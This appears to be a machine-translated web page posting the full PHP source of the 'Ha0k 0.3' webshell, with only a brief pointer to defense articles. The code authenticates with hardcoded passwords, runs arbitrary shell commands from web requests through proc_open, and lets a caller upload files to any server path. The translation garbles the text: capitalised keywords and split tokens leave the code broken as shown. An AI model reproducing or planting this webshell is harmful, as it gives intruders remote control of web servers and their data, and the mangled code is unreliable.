Ha0k0.3PHP webpage Trojan modified version _ php instance

Ha0k0.3PHP webpage Trojan modified version. For more information about the defense methods of such files, see the articles published by the script house. The code is as follows:

// Multiple users can be set here
$ Passwd = array ('ha0k' => 'ha0k ',
'Hackerdsb' => 'hackerdsb ');
/* Set the command alias here */
$ Aliases = array ('Ls' => 'ipconfig ',
'Ll '=> 'ls-lvhF ');
If (! Isset ($ _ SERVER ['php _ AUTH_USER ']) |! Isset ($ _ SERVER ['php _ AUTH_PW ']) |
! Isset ($ passwd [$ _ SERVER ['php _ AUTH_USER ']) |
$ Passwd [$ _ SERVER ['php _ AUTH_USER ']! = $ _ SERVER ['php _ AUTH_PW ']) {
Header ('www-Authenticate: Basic realm = "by Ha0k "');
Header ('http/1.0 401 unauthorized ');
$ Authenticated = false;
}
Else {
$ Authenticated = true;
/* Start session */
Session_start ();
/* Initialize session .*/
If (empty ($ _ SESSION ['cwd ']) |! Empty ($ _ REQUEST ['reset']) {
$ _ SESSION ['cwd '] = getcwd (); // Obtain the current directory
$ _ SESSION ['History '] = array ();
$ _ SESSION ['output'] = '';
}
If (! Empty ($ _ REQUEST ['command']) {
If (get_magic_quotes_gpc () {// table 0 is disabled, Table 1 is enabled, and filtering is enabled
/* We don't want to add the commands to the history in
* Escaped form, so we remove the backslashes now .*/
$ _ REQUEST ['command'] = stripslashes ($ _ REQUEST ['command']); // returns the original string processed by the addslashes () function.
}
/* History */
If ($ I = array_search ($ _ REQUEST ['command'], $ _ SESSION ['History '])! = False) // find the value in the saved array
Unset ($ _ SESSION ['History '] [$ I]); // destroy
Array_unshift ($ _ SESSION ['History '], $ _ REQUEST ['command']); // The array_unshift () function inserts new elements into an array. The new array is added to the beginning of the original array. The function returns an array after the new element is inserted.
/* Output Ha0k # command */
$ _ SESSION ['output']. = 'ha0k # '. $ _ REQUEST ['command']. "\ n ";
/* Initialize the current working directory .*/
If (ereg ('^ [: blank:] * cd [[: blank:] * $', $ _ REQUEST ['command']) {
$ _ SESSION ['cwd '] = dirname (_ FILE _); // Obtain the current directory
} Elseif (ereg ('^ [: blank:] * cd [[: blank:] + ([^;] +) $ ', $ _ REQUEST ['command'], $ regs )){
/* The current command is a 'CD' command which we have to handle
* As an internal shell command .*/
If ($ regs [1] [0] = '/'){
/* Absolute path, we use it unchanged .*/
$ New_dir = $ regs [1];
} Else {
/* Relative path, we append it to the current working
* Directory .*/
$ New_dir = $ _ SESSION ['cwd '].'/'. $ regs [1];
}
/* Transform '/./'into '/'*/
While (strpos ($ new_dir ,'/./')! = False)
$ New_dir = str_replace ('/./', '/', $ new_dir );
/* Transform '// 'input '/'*/
While (strpos ($ new_dir ,'//')! = False)
$ New_dir = str_replace ('//', '/', $ new_dir );
/* Transform 'X/... 'into ''*/
While (preg_match ('| /\.\.(?! \.) | ', $ New_dir ))
$ New_dir = preg_replace ('| /? [^/] + /\.\.(?! \.) | ', '', $ New_dir );
If ($ new_dir = '') $ new_dir = '/';
/* Try to change directory .*/
If (@ chdir ($ new_dir) {// change the current directory
$ _ SESSION ['cwd '] = $ new_dir;
} Else {
$ _ SESSION ['output']. = "cd: cocould not change to: $ new_dir \ n ";
}
} Else {
/* The command is not a 'CD' command, so we execute it after
* Changing the directory and save the output .*/
Chdir ($ _ SESSION ['cwd ']); // change the Directory
/* Alias extension */
$ Length = strcspn ($ _ REQUEST ['command'], "\ t"); // find the \ t string and return the position
$ Token = substr ($ _ REQUEST ['command'], 0, $ length); // Obtain the string 0-\ t
If (isset ($ aliases [$ token])
$ _ REQUEST ['command'] = $ aliases [$ token]. substr ($ _ REQUEST ['command'], $ length );
$ P = proc_open ($ _ REQUEST ['command'], // execute the script
Array (1 => array ('pipe', 'w '),
2 => array ('pipe', 'w ')),
$ Io );
/* Read and send */
While (! Feof ($ io [1]) {
$ _ SESSION ['output']. = htmlspecialchars (fgets ($ io [1]), // Convert Special characters to HTML Character encoding
ENT_COMPAT, 'gb2312 ');
}
/* Read */
While (! Feof ($ io [2]) {
$ _ SESSION ['output']. = htmlspecialchars (fgets ($ io [2]),
ENT_COMPAT, 'gb2312 ');
}
Fclose ($ io [1]);
Fclose ($ io [2]);
Proc_close ($ p); // Close the MPs queue
}
}
/* Build Command History in JavaScript */
If (empty ($ _ SESSION ['History ']) {
$ Js_command_hist = '""';
} Else {
$ Escaped = array_map ('addslashes ', $ _ SESSION ['History']);
$ Js_command_hist = '"", "'. implode ('", "', $ escaped). '"'; // string the array.
}
}
Header ('content-Type: text/html; charset = GB2312 ');
Echo' '. "\ N ";
?>
If (is_uploaded_file ($ HTTP_POST_FILES ['userfile'] ['tmp _ name']) {
Copy ($ HTTP_POST_FILES ['userfile'] ['tmp _ name'], $ _ POST ['remotefile']);
// Echo "file uploaded successfully:". $ HTTP_POST_FILES ['userfile'] ['name'];
}
?>
Http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd>


Ha0k webshell